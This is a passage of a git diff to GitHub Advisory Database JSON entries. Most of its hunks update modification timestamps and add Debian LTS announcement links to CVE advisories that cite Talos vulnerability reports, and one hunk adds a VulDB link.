"GHSA-655f-j2cx-ww9q", - "modified": "2024-01-08T15:30:30Z", + "modified": "2024-04-09T21:31:55Z", "published": "2024-01-08T15:30:30Z", "aliases": [ "CVE-2023-39443" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39443" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1826" diff --git a/advisories/unreviewed/2024/01/GHSA-66fm-27xg-wrx7/GHSA-66fm-27xg-wrx7.json b/advisories/unreviewed/2024/01/GHSA-66fm-27xg-wrx7/GHSA-66fm-27xg-wrx7.json index 35374c3522d..3e53a6bde21 100644 --- a/advisories/unreviewed/2024/01/GHSA-66fm-27xg-wrx7/GHSA-66fm-27xg-wrx7.json +++ b/advisories/unreviewed/2024/01/GHSA-66fm-27xg-wrx7/GHSA-66fm-27xg-wrx7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-66fm-27xg-wrx7", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-35964" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35964" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1786" diff --git a/advisories/unreviewed/2024/01/GHSA-6m28-3r86-ccr3/GHSA-6m28-3r86-ccr3.json b/advisories/unreviewed/2024/01/GHSA-6m28-3r86-ccr3/GHSA-6m28-3r86-ccr3.json index e9f8019b583..10b65e4f729 100644 --- a/advisories/unreviewed/2024/01/GHSA-6m28-3r86-ccr3/GHSA-6m28-3r86-ccr3.json +++ b/advisories/unreviewed/2024/01/GHSA-6m28-3r86-ccr3/GHSA-6m28-3r86-ccr3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6m28-3r86-ccr3", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:54Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-37578" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37578" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1806" diff --git a/advisories/unreviewed/2024/01/GHSA-6r73-mrfj-4ww6/GHSA-6r73-mrfj-4ww6.json b/advisories/unreviewed/2024/01/GHSA-6r73-mrfj-4ww6/GHSA-6r73-mrfj-4ww6.json index 74610995948..93c4dab4661 100644 --- a/advisories/unreviewed/2024/01/GHSA-6r73-mrfj-4ww6/GHSA-6r73-mrfj-4ww6.json +++ b/advisories/unreviewed/2024/01/GHSA-6r73-mrfj-4ww6/GHSA-6r73-mrfj-4ww6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6r73-mrfj-4ww6", - "modified": "2024-01-08T15:30:27Z", + "modified": "2024-04-09T21:31:52Z", "published": "2024-01-08T15:30:27Z", "aliases": [ "CVE-2023-35957" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35957" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1785" diff --git a/advisories/unreviewed/2024/01/GHSA-7fr5-x4fw-q767/GHSA-7fr5-x4fw-q767.json b/advisories/unreviewed/2024/01/GHSA-7fr5-x4fw-q767/GHSA-7fr5-x4fw-q767.json index 484b297d5d0..f57970cfa93 100644 --- a/advisories/unreviewed/2024/01/GHSA-7fr5-x4fw-q767/GHSA-7fr5-x4fw-q767.json +++ b/advisories/unreviewed/2024/01/GHSA-7fr5-x4fw-q767/GHSA-7fr5-x4fw-q767.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7fr5-x4fw-q767", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-36916" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36916" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1798" diff --git a/advisories/unreviewed/2024/01/GHSA-7xcw-qxc4-v8f9/GHSA-7xcw-qxc4-v8f9.json b/advisories/unreviewed/2024/01/GHSA-7xcw-qxc4-v8f9/GHSA-7xcw-qxc4-v8f9.json index 27f0e1d2cf1..3d1a5468ee5 100644 --- a/advisories/unreviewed/2024/01/GHSA-7xcw-qxc4-v8f9/GHSA-7xcw-qxc4-v8f9.json +++ b/advisories/unreviewed/2024/01/GHSA-7xcw-qxc4-v8f9/GHSA-7xcw-qxc4-v8f9.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7xcw-qxc4-v8f9", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-35960" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35960" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1786" diff --git a/advisories/unreviewed/2024/01/GHSA-89gm-h4q5-gp3r/GHSA-89gm-h4q5-gp3r.json b/advisories/unreviewed/2024/01/GHSA-89gm-h4q5-gp3r/GHSA-89gm-h4q5-gp3r.json index eaf29b417c9..f4ace736c79 100644 --- a/advisories/unreviewed/2024/01/GHSA-89gm-h4q5-gp3r/GHSA-89gm-h4q5-gp3r.json +++ b/advisories/unreviewed/2024/01/GHSA-89gm-h4q5-gp3r/GHSA-89gm-h4q5-gp3r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-89gm-h4q5-gp3r", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-37416" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37416" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1804" diff --git a/advisories/unreviewed/2024/01/GHSA-8g39-682j-5v37/GHSA-8g39-682j-5v37.json b/advisories/unreviewed/2024/01/GHSA-8g39-682j-5v37/GHSA-8g39-682j-5v37.json index 33f563c7a30..11f06af3255 100644 --- a/advisories/unreviewed/2024/01/GHSA-8g39-682j-5v37/GHSA-8g39-682j-5v37.json +++ b/advisories/unreviewed/2024/01/GHSA-8g39-682j-5v37/GHSA-8g39-682j-5v37.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8g39-682j-5v37", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-35963" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35963" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1786" diff --git a/advisories/unreviewed/2024/01/GHSA-8gw5-cvgr-jgv5/GHSA-8gw5-cvgr-jgv5.json b/advisories/unreviewed/2024/01/GHSA-8gw5-cvgr-jgv5/GHSA-8gw5-cvgr-jgv5.json index 269c30d1ada..36e5507b970 100644 --- a/advisories/unreviewed/2024/01/GHSA-8gw5-cvgr-jgv5/GHSA-8gw5-cvgr-jgv5.json +++ b/advisories/unreviewed/2024/01/GHSA-8gw5-cvgr-jgv5/GHSA-8gw5-cvgr-jgv5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8gw5-cvgr-jgv5", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:55Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-39316" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39316" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1820" diff --git a/advisories/unreviewed/2024/01/GHSA-8vjg-qcpg-mp3p/GHSA-8vjg-qcpg-mp3p.json b/advisories/unreviewed/2024/01/GHSA-8vjg-qcpg-mp3p/GHSA-8vjg-qcpg-mp3p.json index d9238a400fc..903cf479f18 100644 --- a/advisories/unreviewed/2024/01/GHSA-8vjg-qcpg-mp3p/GHSA-8vjg-qcpg-mp3p.json +++ b/advisories/unreviewed/2024/01/GHSA-8vjg-qcpg-mp3p/GHSA-8vjg-qcpg-mp3p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8vjg-qcpg-mp3p", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-36864" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36864" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1797" diff --git a/advisories/unreviewed/2024/01/GHSA-97xh-jvgw-7w42/GHSA-97xh-jvgw-7w42.json b/advisories/unreviewed/2024/01/GHSA-97xh-jvgw-7w42/GHSA-97xh-jvgw-7w42.json index ccba0a23c8a..9dde065943c 100644 --- a/advisories/unreviewed/2024/01/GHSA-97xh-jvgw-7w42/GHSA-97xh-jvgw-7w42.json +++ b/advisories/unreviewed/2024/01/GHSA-97xh-jvgw-7w42/GHSA-97xh-jvgw-7w42.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-97xh-jvgw-7w42", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:55Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-39273" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39273" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1818" diff --git a/advisories/unreviewed/2024/01/GHSA-c5ph-w6xf-q6r8/GHSA-c5ph-w6xf-q6r8.json b/advisories/unreviewed/2024/01/GHSA-c5ph-w6xf-q6r8/GHSA-c5ph-w6xf-q6r8.json index 85209bfb56e..6728d2a4038 100644 --- a/advisories/unreviewed/2024/01/GHSA-c5ph-w6xf-q6r8/GHSA-c5ph-w6xf-q6r8.json +++ b/advisories/unreviewed/2024/01/GHSA-c5ph-w6xf-q6r8/GHSA-c5ph-w6xf-q6r8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c5ph-w6xf-q6r8", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:54Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-38648" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38648" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1813" diff --git a/advisories/unreviewed/2024/01/GHSA-c93f-7m77-g46f/GHSA-c93f-7m77-g46f.json b/advisories/unreviewed/2024/01/GHSA-c93f-7m77-g46f/GHSA-c93f-7m77-g46f.json index 97ec541817b..b8f2a0627c0 100644 --- a/advisories/unreviewed/2024/01/GHSA-c93f-7m77-g46f/GHSA-c93f-7m77-g46f.json +++ b/advisories/unreviewed/2024/01/GHSA-c93f-7m77-g46f/GHSA-c93f-7m77-g46f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c93f-7m77-g46f", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-35996" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35996" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1791" diff --git a/advisories/unreviewed/2024/01/GHSA-cc4r-723q-4m79/GHSA-cc4r-723q-4m79.json b/advisories/unreviewed/2024/01/GHSA-cc4r-723q-4m79/GHSA-cc4r-723q-4m79.json index ee853ee6dfa..817f183a9e0 100644 --- a/advisories/unreviewed/2024/01/GHSA-cc4r-723q-4m79/GHSA-cc4r-723q-4m79.json +++ b/advisories/unreviewed/2024/01/GHSA-cc4r-723q-4m79/GHSA-cc4r-723q-4m79.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cc4r-723q-4m79", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:55Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-39274" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39274" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1818" diff --git a/advisories/unreviewed/2024/01/GHSA-cc62-wjgc-635w/GHSA-cc62-wjgc-635w.json b/advisories/unreviewed/2024/01/GHSA-cc62-wjgc-635w/GHSA-cc62-wjgc-635w.json index 66413b40814..1c79f904e55 100644 --- a/advisories/unreviewed/2024/01/GHSA-cc62-wjgc-635w/GHSA-cc62-wjgc-635w.json +++ b/advisories/unreviewed/2024/01/GHSA-cc62-wjgc-635w/GHSA-cc62-wjgc-635w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cc62-wjgc-635w", - "modified": "2024-01-08T15:30:27Z", + "modified": "2024-04-09T21:31:52Z", "published": "2024-01-08T15:30:27Z", "aliases": [ "CVE-2023-35955" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35955" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1785" diff --git a/advisories/unreviewed/2024/01/GHSA-cf7q-84pj-gw7g/GHSA-cf7q-84pj-gw7g.json b/advisories/unreviewed/2024/01/GHSA-cf7q-84pj-gw7g/GHSA-cf7q-84pj-gw7g.json index e90f3244c21..5eec3762a59 100644 --- a/advisories/unreviewed/2024/01/GHSA-cf7q-84pj-gw7g/GHSA-cf7q-84pj-gw7g.json +++ b/advisories/unreviewed/2024/01/GHSA-cf7q-84pj-gw7g/GHSA-cf7q-84pj-gw7g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cf7q-84pj-gw7g", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-36747" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36747" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1793" diff --git a/advisories/unreviewed/2024/01/GHSA-cggv-xvc5-x9mm/GHSA-cggv-xvc5-x9mm.json b/advisories/unreviewed/2024/01/GHSA-cggv-xvc5-x9mm/GHSA-cggv-xvc5-x9mm.json index a9afbd4a344..4ffd12772b5 100644 --- a/advisories/unreviewed/2024/01/GHSA-cggv-xvc5-x9mm/GHSA-cggv-xvc5-x9mm.json +++ b/advisories/unreviewed/2024/01/GHSA-cggv-xvc5-x9mm/GHSA-cggv-xvc5-x9mm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cggv-xvc5-x9mm", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:54Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-37577" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37577" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1806" diff --git a/advisories/unreviewed/2024/01/GHSA-cjwc-h345-hghp/GHSA-cjwc-h345-hghp.json b/advisories/unreviewed/2024/01/GHSA-cjwc-h345-hghp/GHSA-cjwc-h345-hghp.json index 4a77f587fd5..882345a3e18 100644 --- a/advisories/unreviewed/2024/01/GHSA-cjwc-h345-hghp/GHSA-cjwc-h345-hghp.json +++ b/advisories/unreviewed/2024/01/GHSA-cjwc-h345-hghp/GHSA-cjwc-h345-hghp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cjwc-h345-hghp", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-36915" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36915" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1798" diff --git a/advisories/unreviewed/2024/01/GHSA-f5c7-4jcc-2vq6/GHSA-f5c7-4jcc-2vq6.json b/advisories/unreviewed/2024/01/GHSA-f5c7-4jcc-2vq6/GHSA-f5c7-4jcc-2vq6.json index 066f233f2cc..9041747ddb9 100644 --- a/advisories/unreviewed/2024/01/GHSA-f5c7-4jcc-2vq6/GHSA-f5c7-4jcc-2vq6.json +++ b/advisories/unreviewed/2024/01/GHSA-f5c7-4jcc-2vq6/GHSA-f5c7-4jcc-2vq6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f5c7-4jcc-2vq6", - "modified": "2024-01-08T15:30:27Z", + "modified": "2024-04-09T21:31:52Z", "published": "2024-01-08T15:30:27Z", "aliases": [ "CVE-2023-35128" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35128" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1792" diff --git a/advisories/unreviewed/2024/01/GHSA-f5jr-v79w-8298/GHSA-f5jr-v79w-8298.json b/advisories/unreviewed/2024/01/GHSA-f5jr-v79w-8298/GHSA-f5jr-v79w-8298.json index 9407a13edf7..0b0ddeabb2c 100644 --- a/advisories/unreviewed/2024/01/GHSA-f5jr-v79w-8298/GHSA-f5jr-v79w-8298.json +++ b/advisories/unreviewed/2024/01/GHSA-f5jr-v79w-8298/GHSA-f5jr-v79w-8298.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f5jr-v79w-8298", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-36746" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36746" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1793" diff --git a/advisories/unreviewed/2024/01/GHSA-f634-fjh7-4pvv/GHSA-f634-fjh7-4pvv.json b/advisories/unreviewed/2024/01/GHSA-f634-fjh7-4pvv/GHSA-f634-fjh7-4pvv.json index 2ebd5c037cf..b13e4484c95 100644 --- a/advisories/unreviewed/2024/01/GHSA-f634-fjh7-4pvv/GHSA-f634-fjh7-4pvv.json +++ b/advisories/unreviewed/2024/01/GHSA-f634-fjh7-4pvv/GHSA-f634-fjh7-4pvv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f634-fjh7-4pvv", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:55Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-39271" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39271" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1818" diff --git a/advisories/unreviewed/2024/01/GHSA-ffxf-wxjm-c2gq/GHSA-ffxf-wxjm-c2gq.json b/advisories/unreviewed/2024/01/GHSA-ffxf-wxjm-c2gq/GHSA-ffxf-wxjm-c2gq.json index 07e8808b6cc..2fed6350ace 100644 --- a/advisories/unreviewed/2024/01/GHSA-ffxf-wxjm-c2gq/GHSA-ffxf-wxjm-c2gq.json +++ b/advisories/unreviewed/2024/01/GHSA-ffxf-wxjm-c2gq/GHSA-ffxf-wxjm-c2gq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-ffxf-wxjm-c2gq", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-35989" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35989" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1822" diff --git a/advisories/unreviewed/2024/01/GHSA-fjfp-5xx8-cgr2/GHSA-fjfp-5xx8-cgr2.json b/advisories/unreviewed/2024/01/GHSA-fjfp-5xx8-cgr2/GHSA-fjfp-5xx8-cgr2.json index 5360a6f896d..58a3bd00440 100644 --- a/advisories/unreviewed/2024/01/GHSA-fjfp-5xx8-cgr2/GHSA-fjfp-5xx8-cgr2.json +++ b/advisories/unreviewed/2024/01/GHSA-fjfp-5xx8-cgr2/GHSA-fjfp-5xx8-cgr2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fjfp-5xx8-cgr2", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-37445" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37445" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1805" diff --git a/advisories/unreviewed/2024/01/GHSA-g454-m7r7-f68q/GHSA-g454-m7r7-f68q.json b/advisories/unreviewed/2024/01/GHSA-g454-m7r7-f68q/GHSA-g454-m7r7-f68q.json index 24d3e19d7ca..7eff1ac8c65 100644 --- a/advisories/unreviewed/2024/01/GHSA-g454-m7r7-f68q/GHSA-g454-m7r7-f68q.json +++ b/advisories/unreviewed/2024/01/GHSA-g454-m7r7-f68q/GHSA-g454-m7r7-f68q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g454-m7r7-f68q", - "modified": "2024-01-08T15:30:30Z", + "modified": "2024-04-09T21:31:55Z", "published": "2024-01-08T15:30:30Z", "aliases": [ "CVE-2023-39413" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39413" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1824" diff --git a/advisories/unreviewed/2024/01/GHSA-g5p5-24rg-6xfq/GHSA-g5p5-24rg-6xfq.json b/advisories/unreviewed/2024/01/GHSA-g5p5-24rg-6xfq/GHSA-g5p5-24rg-6xfq.json index f560f5a4506..2d4d786f5c8 100644 --- a/advisories/unreviewed/2024/01/GHSA-g5p5-24rg-6xfq/GHSA-g5p5-24rg-6xfq.json +++ b/advisories/unreviewed/2024/01/GHSA-g5p5-24rg-6xfq/GHSA-g5p5-24rg-6xfq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g5p5-24rg-6xfq", - "modified": "2024-01-19T15:30:20Z", + "modified": "2024-04-09T09:31:10Z", "published": "2024-01-19T15:30:20Z", "aliases": [ "CVE-2024-0716" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.251541" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.265177" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-g698-8w35-cq5r/GHSA-g698-8w35-cq5r.json b/advisories/unreviewed/2024/01/GHSA-g698-8w35-cq5r/GHSA-g698-8w35-cq5r.json index c76882fbda6..48cca431ffb 100644 --- a/advisories/unreviewed/2024/01/GHSA-g698-8w35-cq5r/GHSA-g698-8w35-cq5r.json +++ b/advisories/unreviewed/2024/01/GHSA-g698-8w35-cq5r/GHSA-g698-8w35-cq5r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g698-8w35-cq5r", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-35995" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35995" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1791" diff --git a/advisories/unreviewed/2024/01/GHSA-g9rv-78v8-8hq5/GHSA-g9rv-78v8-8hq5.json b/advisories/unreviewed/2024/01/GHSA-g9rv-78v8-8hq5/GHSA-g9rv-78v8-8hq5.json index 1f2e591b0da..e954337f30b 100644 --- a/advisories/unreviewed/2024/01/GHSA-g9rv-78v8-8hq5/GHSA-g9rv-78v8-8hq5.json +++ b/advisories/unreviewed/2024/01/GHSA-g9rv-78v8-8hq5/GHSA-g9rv-78v8-8hq5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g9rv-78v8-8hq5", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-37446" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37446" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1805" diff --git a/advisories/unreviewed/2024/01/GHSA-gc44-mvvx-cvhm/GHSA-gc44-mvvx-cvhm.json b/advisories/unreviewed/2024/01/GHSA-gc44-mvvx-cvhm/GHSA-gc44-mvvx-cvhm.json index 21167e86341..d34a3e8e85d 100644 --- a/advisories/unreviewed/2024/01/GHSA-gc44-mvvx-cvhm/GHSA-gc44-mvvx-cvhm.json +++ b/advisories/unreviewed/2024/01/GHSA-gc44-mvvx-cvhm/GHSA-gc44-mvvx-cvhm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gc44-mvvx-cvhm", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:55Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-39270" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39270" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1818" diff --git a/advisories/unreviewed/2024/01/GHSA-gcqr-v3j7-qf2p/GHSA-gcqr-v3j7-qf2p.json b/advisories/unreviewed/2024/01/GHSA-gcqr-v3j7-qf2p/GHSA-gcqr-v3j7-qf2p.json index d2bbd431810..6c3f497ce8a 100644 --- a/advisories/unreviewed/2024/01/GHSA-gcqr-v3j7-qf2p/GHSA-gcqr-v3j7-qf2p.json +++ b/advisories/unreviewed/2024/01/GHSA-gcqr-v3j7-qf2p/GHSA-gcqr-v3j7-qf2p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": 